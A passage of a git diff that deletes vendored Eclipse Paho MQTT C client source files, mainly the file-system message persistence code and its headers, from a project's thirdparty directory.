-			}
-			if (msgkeys[i])
-			{
-				free(msgkeys[i]);
-			}
-			i++;
-		}
-		if (msgkeys != NULL)
-			free(msgkeys);
-	}
-	Log(TRACE_MINIMUM, -1, "%d queued messages restored for client %s", entries_restored, c->clientID);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTPersistence.h b/thirdparty/paho.mqtt.c/src/MQTTPersistence.h
deleted file mode 100644
index 9a938ba..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPersistence.h
+++ /dev/null
@@ -1,74 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - async client updates
- *    Ian Craggs - fix for bug 432903 - queue persistence
- *******************************************************************************/
-
-#if defined(__cplusplus)
- extern "C" {
-#endif
-
-#include "Clients.h"
-
-/** Stem of the key for a sent PUBLISH QoS1 or QoS2 */
-#define PERSISTENCE_PUBLISH_SENT "s-"
-/** Stem of the key for a sent PUBREL */
-#define PERSISTENCE_PUBREL "sc-"
-/** Stem of the key for a received PUBLISH QoS2 */
-#define PERSISTENCE_PUBLISH_RECEIVED "r-"
-/** Stem of the key for an async client command */
-#define PERSISTENCE_COMMAND_KEY "c-"
-/** Stem of the key for an async client message queue */
-#define PERSISTENCE_QUEUE_KEY "q-"
-#define PERSISTENCE_MAX_KEY_LENGTH 8
-
-int MQTTPersistence_create(MQTTClient_persistence** per, int type, void* pcontext);
-int MQTTPersistence_initialize(Clients* c, const char* serverURI);
-int MQTTPersistence_close(Clients* c);
-int MQTTPersistence_clear(Clients* c);
-int MQTTPersistence_restore(Clients* c);
-void* MQTTPersistence_restorePacket(char* buffer, size_t buflen);
-void MQTTPersistence_insertInOrder(List* list, void* content, size_t size);
-int MQTTPersistence_put(int socket, char* buf0, size_t buf0len, int count, 
-								 char** buffers, size_t* buflens, int htype, int msgId, int scr);
-int MQTTPersistence_remove(Clients* c, char* type, int qos, int msgId);
-void MQTTPersistence_wrapMsgID(Clients *c);
-
-typedef struct
-{
-	char struct_id[4];
-	int struct_version;
-	int payloadlen;
-	void* payload;
-	int qos;
-	int retained;
-	int dup;
-	int msgid;
-} MQTTPersistence_message;
-
-typedef struct
-{
-	MQTTPersistence_message* msg;
-	char* topicName;
-	int topicLen;
-	unsigned int seqno; /* only used on restore */
-} MQTTPersistence_qEntry;
-
-int MQTTPersistence_unpersistQueueEntry(Clients* client, MQTTPersistence_qEntry* qe);
-int MQTTPersistence_persistQueueEntry(Clients* aclient, MQTTPersistence_qEntry* qe);
-int MQTTPersistence_restoreMessageQueue(Clients* c);
-#ifdef __cplusplus
-     }
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTPersistenceDefault.c b/thirdparty/paho.mqtt.c/src/MQTTPersistenceDefault.c
deleted file mode 100644
index 35c1f53..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPersistenceDefault.c
+++ /dev/null
@@ -1,841 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2016 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - async client updates
- *    Ian Craggs - fix for bug 484496
- *******************************************************************************/
-
-/**
- * @file
- * \brief A file system based persistence implementation.
- *
- * A directory is specified when the MQTT client is created. When the persistence is then
- * opened (see ::Persistence_open), a sub-directory is made beneath the base for this
- * particular client ID and connection key. This allows one persistence base directory to
- * be shared by multiple clients.
- *
- */
-
-#if !defined(NO_PERSISTENCE)
-
-#include "OsWrapper.h"
-
-#include <stdio.h>
-#include <string.h>
-#include <errno.h>
-
-#if defined(WIN32) || defined(WIN64)
-	#include <direct.h>
-	/* Windows doesn't have strtok_r, so remap it to strtok */
-	#define strtok_r( A, B, C ) strtok( A, B )
-	int keysWin32(char *, char ***, int *);
-	int clearWin32(char *);
-	int containskeyWin32(char *, char *);
-#else
-	#include <sys/stat.h>
-	#include <dirent.h>
-	#include <unistd.h>
-	int keysUnix(char *, char ***, int *);
-	int clearUnix(char *);
-	int containskeyUnix(char *, char *);
-#endif
-
-#include "MQTTClientPersistence.h"
-#include "MQTTPersistenceDefault.h"
-#include "StackTrace.h"
-#include "Heap.h"
-
-/** Create persistence directory for the client: context/clientID-serverURI.
- *  See ::Persistence_open
- */
-
-int pstopen(void **handle, const char* clientID, const char* serverURI, void* context)
-{
-	int rc = 0;
-	char *dataDir = context;
-	char *clientDir;
-	char *pToken = NULL;
-	char *save_ptr = NULL;
-	char *pCrtDirName = NULL;
-	char *pTokDirName = NULL;
-	char *perserverURI = NULL, *ptraux;
-
-	FUNC_ENTRY;
-	/* Note that serverURI=address:port, but ":" not allowed in Windows directories */
-	perserverURI = malloc(strlen(serverURI) + 1);
-	strcpy(perserverURI, serverURI);
-	while ((ptraux = strstr(perserverURI, ":")) != NULL)

-		*ptraux = '-' ;
-
-	/* consider '/'  +  '-'  +  '\0' */
-	clientDir = malloc(strlen(dataDir) + strlen(clientID) + strlen(perserverURI) + 3);
-	sprintf(clientDir, "%s/%s-%s", dataDir, clientID, perserverURI);
-
-
-	/* create clientDir directory */
-
-	/* pCrtDirName - holds the directory name we are currently trying to create.           */
-	/*               This gets built up level by level until the full path name is created.*/
-	/* pTokDirName - holds the directory name that gets used by strtok.         */
-	pCrtDirName = (char*)malloc( strlen(clientDir) + 1 );
-	pTokDirName = (char*)malloc( strlen(clientDir) + 1 );
-	strcpy( pTokDirName, clientDir );
-
-	pToken = strtok_r( pTokDirName, "\\/", &save_ptr );
-
-	strcpy( pCrtDirName, pToken );
-	rc = pstmkdir( pCrtDirName );
-	pToken = strtok_r( NULL, "\\/", &save_ptr );
-	while ( (pToken != NULL) && (rc == 0) )
-	{
-		/* Append the next directory level and try to create it */
-		strcat( pCrtDirName, "/" );
-		strcat( pCrtDirName, pToken );
-		rc = pstmkdir( pCrtDirName );
-		pToken = strtok_r( NULL, "\\/", &save_ptr );
-	}
-
-	*handle = clientDir;
-
-	free(pTokDirName);
-	free(pCrtDirName);
-	free(perserverURI);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-/** Function to create a directory.
- * Returns 0 on success or if the directory already exists.
- */
-int pstmkdir( char *pPathname )
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	if ( _mkdir( pPathname ) != 0 )
-	{
-#else
-	/* Create a directory with read, write and execute access for the owner and read access for the group */
-#if !defined(_WRS_KERNEL)
-	if ( mkdir( pPathname, S_IRWXU | S_IRGRP ) != 0 )
-#else
-	if ( mkdir( pPathname ) != 0 )
-#endif /* !defined(_WRS_KERNEL) */
-	{
-#endif
-		if ( errno != EEXIST )
-			rc = MQTTCLIENT_PERSISTENCE_ERROR;
-	}
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-/** Write wire message to the client persistence directory.
- *  See ::Persistence_put
- */
-int pstput(void* handle, char* key, int bufcount, char* buffers[], int buflens[])
-{
-	int rc = 0;
-	char *clientDir = handle;
-	char *file;
-	FILE *fp;
-	size_t bytesWritten = 0,
-	       bytesTotal = 0;
-	int i;
-
-	FUNC_ENTRY;
-	if (clientDir == NULL)
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-	/* consider '/' + '\0' */
-	file = malloc(strlen(clientDir) + strlen(key) + strlen(MESSAGE_FILENAME_EXTENSION) + 2 );
-	sprintf(file, "%s/%s%s", clientDir, key, MESSAGE_FILENAME_EXTENSION);
-
-	fp = fopen(file, "wb");
-	if ( fp != NULL )
-	{
-		for(i=0; i<bufcount; i++)
-		{
-			bytesTotal += buflens[i];
-			bytesWritten += fwrite(buffers[i], sizeof(char), buflens[i], fp );
-		}
-		fclose(fp);
-		fp = NULL;
-	} else
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-
-	if (bytesWritten != bytesTotal)
-	{
-		pstremove(handle, key);
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-	}
-
-	free(file);
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-};
-
-
-/** Retrieve a wire message from the client persistence directory.
- *  See ::Persistence_get
- */
-int pstget(void* handle, char* key, char** buffer, int* buflen)
-{
-	int rc = 0;
-	FILE *fp;
-	char *clientDir = handle;
-	char *file;
-	char *buf;
-	unsigned long fileLen = 0;
-	unsigned long bytesRead = 0;
-
-	FUNC_ENTRY;
-	if (clientDir == NULL)
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-	/* consider '/' + '\0' */
-	file = malloc(strlen(clientDir) + strlen(key) + strlen(MESSAGE_FILENAME_EXTENSION) + 2);
-	sprintf(file, "%s/%s%s", clientDir, key, MESSAGE_FILENAME_EXTENSION);
-
-	fp = fopen(file, "rb");
-	if ( fp != NULL )
-	{
-		fseek(fp, 0, SEEK_END);
-		fileLen = ftell(fp);
-		fseek(fp, 0, SEEK_SET);
-		buf=(char *)malloc(fileLen);
-		bytesRead = (int)fread(buf, sizeof(char), fileLen, fp);
-		*buffer = buf;
-		*buflen = bytesRead;
-		if ( bytesRead != fileLen )
-			rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		fclose(fp);
-		fp = NULL;
-	} else
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-
-	free(file);
-	/* the caller must free buf */
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-/** Delete a persisted message from the client persistence directory.
- *  See ::Persistence_remove
- */
-int pstremove(void* handle, char* key)
-{
-	int rc = 0;
-	char *clientDir = handle;
-	char *file;
-
-	FUNC_ENTRY;
-	if (clientDir == NULL)
-	{
-		return rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-	/* consider '/' + '\0' */
-	file = malloc(strlen(clientDir) + strlen(key) + strlen(MESSAGE_FILENAME_EXTENSION) + 2);
-	sprintf(file, "%s/%s%s", clientDir, key, MESSAGE_FILENAME_EXTENSION);
-
-#if defined(WIN32) || defined(WIN64)
-	if ( _unlink(file) != 0 )
-	{
-#else
-	if ( unlink(file) != 0 )
-	{
-#endif
-		if ( errno != ENOENT )
-			rc = MQTTCLIENT_PERSISTENCE_ERROR;
-	}
-
-	free(file);
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/** Delete client persistence directory (if empty).
- *  See ::Persistence_close
- */
-int pstclose(void* handle)
-{
-	int rc = 0;
-	char *clientDir = handle;
-
-	FUNC_ENTRY;
-	if (clientDir == NULL)
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-#if defined(WIN32) || defined(WIN64)
-	if ( _rmdir(clientDir) != 0 )
-	{
-#else
-	if ( rmdir(clientDir) != 0 )
-	{
-#endif
-		if ( errno != ENOENT && errno != ENOTEMPTY )
-			rc = MQTTCLIENT_PERSISTENCE_ERROR;
-	}
-
-	free(clientDir);
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/** Returns whether if a wire message is persisted in the client persistence directory.
- * See ::Persistence_containskey
- */
-int pstcontainskey(void *handle, char *key)
-{
-	int rc = 0;
-	char *clientDir = handle;
-
-	FUNC_ENTRY;
-	if (clientDir == NULL)
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-#if defined(WIN32) || defined(WIN64)
-	rc = containskeyWin32(clientDir, key);
-#else
-	rc = containskeyUnix(clientDir, key);
-#endif
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-#if defined(WIN32) || defined(WIN64)
-int containskeyWin32(char *dirname, char *key)
-{
-	int notFound = MQTTCLIENT_PERSISTENCE_ERROR;
-	int fFinished = 0;
-	char *filekey, *ptraux;
-	char dir[MAX_PATH+1];
-	WIN32_FIND_DATAA FileData;
-	HANDLE hDir;
-
-	FUNC_ENTRY;
-	sprintf(dir, "%s/*", dirname);
-
-	hDir = FindFirstFileA(dir, &FileData);
-	if (hDir != INVALID_HANDLE_VALUE)
-	{
-		while (!fFinished)
-		{
-			if (FileData.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE)
-			{
-				filekey = malloc(strlen(FileData.cFileName) + 1);
-				strcpy(filekey, FileData.cFileName);
-				ptraux = strstr(filekey, MESSAGE_FILENAME_EXTENSION);
-				if ( ptraux != NULL )
-					*ptraux = '\0' ;
-				if(strcmp(filekey, key) == 0)
-				{
-					notFound = 0;
-					fFinished = 1;
-				}
-				free(filekey);
-			}
-			if (!FindNextFileA(hDir, &FileData))
-			{
-				if (GetLastError() == ERROR_NO_MORE_FILES)
-					fFinished = 1;
-			}
-		}
-		FindClose(hDir);
-	}
-
-	FUNC_EXIT_RC(notFound);
-	return notFound;
-}
-#else
-int containskeyUnix(char *dirname, char *key)
-{
-	int notFound = MQTTCLIENT_PERSISTENCE_ERROR;
-	char *filekey, *ptraux;
-	DIR *dp;
-	struct dirent *dir_entry;
-	struct stat stat_info;
-
-	FUNC_ENTRY;
-	if((dp = opendir(dirname)) != NULL)
-	{
-		while((dir_entry = readdir(dp)) != NULL && notFound)
-		{
-			char* filename = malloc(strlen(dirname) + strlen(dir_entry->d_name) + 2);
-			sprintf(filename, "%s/%s", dirname, dir_entry->d_name);
-			lstat(filename, &stat_info);
-			free(filename);
-			if(S_ISREG(stat_info.st_mode))
-			{
-				filekey = malloc(strlen(dir_entry->d_name) + 1);
-				strcpy(filekey, dir_entry->d_name);
-				ptraux = strstr(filekey, MESSAGE_FILENAME_EXTENSION);
-				if ( ptraux != NULL )
-					*ptraux = '\0' ;
-				if(strcmp(filekey, key) == 0)
-					notFound = 0;
-				free(filekey);
-			}
-		}
-		closedir(dp);
-	}
-
-	FUNC_EXIT_RC(notFound);
-	return notFound;
-}
-#endif
-
-
-/** Delete all the persisted message in the client persistence directory.
- * See ::Persistence_clear
- */
-int pstclear(void *handle)
-{
-	int rc = 0;
-	char *clientDir = handle;
-
-	FUNC_ENTRY;
-	if (clientDir == NULL)
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-#if defined(WIN32) || defined(WIN64)
-	rc = clearWin32(clientDir);
-#else
-	rc = clearUnix(clientDir);
-#endif
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-#if defined(WIN32) || defined(WIN64)
-int clearWin32(char *dirname)
-{
-	int rc = 0;
-	int fFinished = 0;
-	char *file;
-	char dir[MAX_PATH+1];
-	WIN32_FIND_DATAA FileData;
-	HANDLE hDir;
-
-	FUNC_ENTRY;
-	sprintf(dir, "%s/*", dirname);
-
-	hDir = FindFirstFileA(dir, &FileData);
-	if (hDir != INVALID_HANDLE_VALUE)
-	{
-		while (!fFinished)
-		{
-			if (FileData.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE)
-			{
-				file = malloc(strlen(dirname) + strlen(FileData.cFileName) + 2);
-				sprintf(file, "%s/%s", dirname, FileData.cFileName);
-				rc = remove(file);
-				free(file);
-				if ( rc != 0 )
-				{
-					rc = MQTTCLIENT_PERSISTENCE_ERROR;
-					break;
-				}
-			}
-			if (!FindNextFileA(hDir, &FileData))
-			{
-				if (GetLastError() == ERROR_NO_MORE_FILES)
-					fFinished = 1;
-			}
-		}
-		FindClose(hDir);
-	} else
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-#else
-int clearUnix(char *dirname)
-{
-	int rc = 0;
-	DIR *dp;
-	struct dirent *dir_entry;
-	struct stat stat_info;
-
-	FUNC_ENTRY;
-	if((dp = opendir(dirname)) != NULL)
-	{
-		while((dir_entry = readdir(dp)) != NULL && rc == 0)
-		{
-			lstat(dir_entry->d_name, &stat_info);
-			if(S_ISREG(stat_info.st_mode))
-			{
-				if ( remove(dir_entry->d_name) != 0 )
-					rc = MQTTCLIENT_PERSISTENCE_ERROR;
-			}
-		}
-		closedir(dp);
-	} else
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-#endif
-
-
-/** Returns the keys (file names w/o the extension) in the client persistence directory.
- *  See ::Persistence_keys
- */
-int pstkeys(void *handle, char ***keys, int *nkeys)
-{
-	int rc = 0;
-	char *clientDir = handle;
-
-	FUNC_ENTRY;
-	if (clientDir == NULL)
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-#if defined(WIN32) || defined(WIN64)
-	rc = keysWin32(clientDir, keys, nkeys);
-#else
-	rc = keysUnix(clientDir, keys, nkeys);
-#endif
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-#if defined(WIN32) || defined(WIN64)
-int keysWin32(char *dirname, char ***keys, int *nkeys)
-{
-	int rc = 0;
-	char **fkeys = NULL;
-	int nfkeys = 0;
-	char dir[MAX_PATH+1];
-	WIN32_FIND_DATAA FileData;
-	HANDLE hDir;
-	int fFinished = 0;
-	char *ptraux;
-	int i;
-
-	FUNC_ENTRY;
-	sprintf(dir, "%s/*", dirname);
-
-	/* get number of keys */
-	hDir = FindFirstFileA(dir, &FileData);
-	if (hDir != INVALID_HANDLE_VALUE)
-	{
-		while (!fFinished)
-		{
-			if (FileData.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE)
-				nfkeys++;
-			if (!FindNextFileA(hDir, &FileData))
-			{
-				if (GetLastError() == ERROR_NO_MORE_FILES)
-					fFinished = 1;
-			}
-		}
-		FindClose(hDir);
-	} else
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-	if (nfkeys != 0 )
-		fkeys = (char **)malloc(nfkeys * sizeof(char *));
-
-	/* copy the keys */
-	hDir = FindFirstFileA(dir, &FileData);
-	if (hDir != INVALID_HANDLE_VALUE)
-	{
-		fFinished = 0;
-		i = 0;
-		while (!fFinished)
-		{
-			if (FileData.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE)
-			{
-				fkeys[i] = malloc(strlen(FileData.cFileName) + 1);
-				strcpy(fkeys[i], FileData.cFileName);
-				ptraux = strstr(fkeys[i], MESSAGE_FILENAME_EXTENSION);
-				if ( ptraux != NULL )
-					*ptraux = '\0' ;
-				i++;
-			}
-			if (!FindNextFileA(hDir, &FileData))
-			{
-				if (GetLastError() == ERROR_NO_MORE_FILES)
-					fFinished = 1;
-			}
-		}
-		FindClose(hDir);
-	} else
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-	*nkeys = nfkeys;
-	*keys = fkeys;
-	/* the caller must free keys */
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-#else
-int keysUnix(char *dirname, char ***keys, int *nkeys)
-{
-	int rc = 0;
-	char **fkeys = NULL;
-	int nfkeys = 0;
-	char *ptraux;
-	int i;
-	DIR *dp;
-	struct dirent *dir_entry;
-	struct stat stat_info;
-
-	FUNC_ENTRY;
-	/* get number of keys */
-	if((dp = opendir(dirname)) != NULL)
-	{
-		while((dir_entry = readdir(dp)) != NULL)
-		{
-			char* temp = malloc(strlen(dirname)+strlen(dir_entry->d_name)+2);
-
-			sprintf(temp, "%s/%s", dirname, dir_entry->d_name);
-			if (lstat(temp, &stat_info) == 0 && S_ISREG(stat_info.st_mode))
-				nfkeys++;
-			free(temp);
-		}
-		closedir(dp);
-	} else
-	{
-		rc = MQTTCLIENT_PERSISTENCE_ERROR;
-		goto exit;
-	}
-
-	if (nfkeys != 0)
-	{
-		fkeys = (char **)malloc(nfkeys * sizeof(char *));
-
-		/* copy the keys */
-		if((dp = opendir(dirname)) != NULL)
-		{
-			i = 0;
-			while((dir_entry = readdir(dp)) != NULL)
-			{
-				char* temp = malloc(strlen(dirname)+strlen(dir_entry->d_name)+2);
-	
-				sprintf(temp, "%s/%s", dirname, dir_entry->d_name);
-				if (lstat(temp, &stat_info) == 0 && S_ISREG(stat_info.st_mode))
-				{
-					fkeys[i] = malloc(strlen(dir_entry->d_name) + 1);
-					strcpy(fkeys[i], dir_entry->d_name);
-					ptraux = strstr(fkeys[i], MESSAGE_FILENAME_EXTENSION);
-					if ( ptraux != NULL )
-						*ptraux = '\0' ;
-					i++;
-				}
-				free(temp);
-			}
-			closedir(dp);
-		} else
-		{
-			rc = MQTTCLIENT_PERSISTENCE_ERROR;
-			goto exit;
-		}
-	}
-
-	*nkeys = nfkeys;
-	*keys = fkeys;
-	/* the caller must free keys */
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-#endif
-
-
-
-#if defined(UNIT_TESTS)
-int main (int argc, char *argv[])
-{
-#define MSTEM "m-"
-#define NMSGS 10
-#define NBUFS 4
-#define NDEL 2
-#define RC !rc ? "(Success)" : "(Failed) "
-
-	int rc;
-	char *handle;
-	char *perdir = ".";
-	const char *clientID = "TheUTClient";
-	const char *serverURI = "127.0.0.1:1883";
-
-	char *stem = MSTEM;
-	int msgId, i;
-	int nm[NDEL] = {5 , 8};  /* msgIds to get and remove */
-
-	char *key;
-	char **keys;
-	int nkeys;
-	char *buffer, *buff;
-	int buflen;
-
-	int nbufs = NBUFS;
-	char *bufs[NBUFS] = {"m0", "mm1", "mmm2" , "mmmm3"};  /* message content */
-	int buflens[NBUFS];
-	for(i=0;i<nbufs;i++)
-		buflens[i]=strlen(bufs[i]);
-
-	/* open */
-	/* printf("Persistence directory : %s\n", perdir); */
-	rc = pstopen((void**)&handle, clientID, serverURI, perdir);
-	printf("%s Persistence directory for client %s : %s\n", RC, clientID, handle);
-
-	/* put */
-	for(msgId=0;msgId<NMSGS;msgId++)
-	{
-		key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-		sprintf(key, "%s%d", stem, msgId);
-		rc = pstput(handle, key, nbufs, bufs, buflens);
-		printf("%s Adding message %s\n", RC, key);
-		free(key);
-	}
-
-	/* keys ,ie, list keys added */
-	rc = pstkeys(handle, &keys, &nkeys);
-	printf("%s Found %d messages persisted in %s\n", RC, nkeys, handle);
-	for(i=0;i<nkeys;i++)
-		printf("%13s\n", keys[i]);
-
-	if (keys !=NULL)
-		free(keys);
-
-	/* containskey */
-	for(i=0;i<NDEL;i++)
-	{
-		key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-		sprintf(key, "%s%d", stem, nm[i]);
-		rc = pstcontainskey(handle, key);
-		printf("%s Message %s is persisted ?\n", RC, key);
-		free(key);
-	}
-
-	/* get && remove*/
-	for(i=0;i<NDEL;i++)
-	{
-		key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-		sprintf(key, "%s%d", stem, nm[i]);
-		rc = pstget(handle, key, &buffer, &buflen);
-		buff = malloc(buflen+1);
-		memcpy(buff, buffer, buflen);
-		buff[buflen] = '\0';
-		printf("%s Retrieving message %s : %s\n", RC, key, buff);
-		rc = pstremove(handle, key);
-		printf("%s Removing message %s\n", RC, key);
-		free(key);
-		free(buff);
-		free(buffer);
-	}
-
-	/* containskey */
-	for(i=0;i<NDEL;i++)
-	{
-		key = malloc(MESSAGE_FILENAME_LENGTH + 1);
-		sprintf(key, "%s%d", stem, nm[i]);
-		rc = pstcontainskey(handle, key);
-		printf("%s Message %s is persisted ?\n", RC, key);
-		free(key);
-	}
-
-	/* keys ,ie, list keys added */
-	rc = pstkeys(handle, &keys, &nkeys);
-	printf("%s Found %d messages persisted in %s\n", RC, nkeys, handle);
-	for(i=0;i<nkeys;i++)
-		printf("%13s\n", keys[i]);
-
-	if (keys != NULL)
-		free(keys);
-
-
-	/* close -> it will fail, since client persistence directory is not empty */
-	rc = pstclose(&handle);
-	printf("%s Closing client persistence directory for client %s\n", RC, clientID);
-
-	/* clear */
-	rc = pstclear(handle);
-	printf("%s Deleting all persisted messages in %s\n", RC, handle);
-
-	/* keys ,ie, list keys added */
-	rc = pstkeys(handle, &keys, &nkeys);
-	printf("%s Found %d messages persisted in %s\n", RC, nkeys, handle);
-	for(i=0;i<nkeys;i++)
-		printf("%13s\n", keys[i]);
-
-	if ( keys != NULL )
-		free(keys);
-
-	/* close */
-	rc = pstclose(&handle);
-	printf("%s Closing client persistence directory for client %s\n", RC, clientID);
-}
-#endif
-
-
-#endif /* NO_PERSISTENCE */
diff --git a/thirdparty/paho.mqtt.c/src/MQTTPersistenceDefault.h b/thirdparty/paho.mqtt.c/src/MQTTPersistenceDefault.h
deleted file mode 100644
index 27fedd6..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPersistenceDefault.h
+++ /dev/null
@@ -1,33 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-/** 8.3 filesystem */
-#define MESSAGE_FILENAME_LENGTH 8    
-/** Extension of the filename */
-#define MESSAGE_FILENAME_EXTENSION ".msg"
-
-/* prototypes of the functions for the default file system persistence */
-int pstopen(void** handle, const char* clientID, const char* serverURI, void* context); 
-int pstclose(void* handle); 
-int pstput(void* handle, char* key, int bufcount, char* buffers[], int buflens[]); 
-int pstget(void* handle, char* key, char** buffer, int* buflen); 
-int pstremove(void* handle, char* key); 
-int pstkeys(void* handle, char*** keys, int* nkeys); 
-int pstclear(void* handle); 
-int pstcontainskey(void* handle, char* key);
-
-int pstmkdir(char *pPathname);
-
diff --git a/thirdparty/paho.mqtt.c/src/MQTTProtocol.h b/thirdparty/paho.mqtt.c/src/MQTTProtocol.h
deleted file mode 100644
index 7478103..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTProtocol.h
+++ /dev/null
@@ -1,46 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - MQTT 3.1.1 updates
- *******************************************************************************/
-
-#if !defined(MQTTPROTOCOL_H)
-#define MQTTPROTOCOL_H
-
-#include "LinkedList.h"
-#include "MQTTPacket.h"
-#include "Clients.h"
-
-#define MAX_MSG_ID 65535
-#define MAX_CLIENTID_LEN 65535
-
-typedef struct
-{
-	int socket;
-	Publications* p;
-} pending_write;
-
-
-typedef struct
-{
-	List publications;
-	unsigned int msgs_received;
-	unsigned int msgs_sent;
-	List pending_writes; /* for qos 0 writes not complete */
-} MQTTProtocol;
-
-
-#include "MQTTProtocolOut.h"
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTProtocolClient.c b/thirdparty/paho.mqtt.c/src/MQTTProtocolClient.c
deleted file mode 100644
index fa3ff63..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTProtocolClient.c
+++ /dev/null
@@ -1,769 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - fix for bug 413429 - connectionLost not called
- *    Ian Craggs - fix for bug 421103 - trying to write to same socket, in retry
- *    Rong Xiang, Ian Craggs - C++ compatibility
- *    Ian Craggs - turn off DUP flag for PUBREL - MQTT 3.1.1
- *******************************************************************************/
-
-/**
- * @file
- * \brief Functions dealing with the MQTT protocol exchanges
- *
- * Some other related functions are in the MQTTProtocolOut module
- * */
-
-
-#include <stdlib.h>
-#include <string.h>
-
-#include "MQTTProtocolClient.h"
-#if !defined(NO_PERSISTENCE)
-#include "MQTTPersistence.h"
-#endif
-#include "SocketBuffer.h"
-#include "StackTrace.h"
-#include "Heap.h"
-
-#if !defined(min)
-#define min(A,B) ( (A) < (B) ? (A):(B))
-#endif
-
-extern MQTTProtocol state;
-extern ClientStates* bstate;
-
-
-static void MQTTProtocol_storeQoS0(Clients* pubclient, Publish* publish);
-static int MQTTProtocol_startPublishCommon(
-		Clients* pubclient,
-		Publish* publish,
-		int qos,
-		int retained);
-static void MQTTProtocol_retries(time_t now, Clients* client, int regardless);
-
-/**
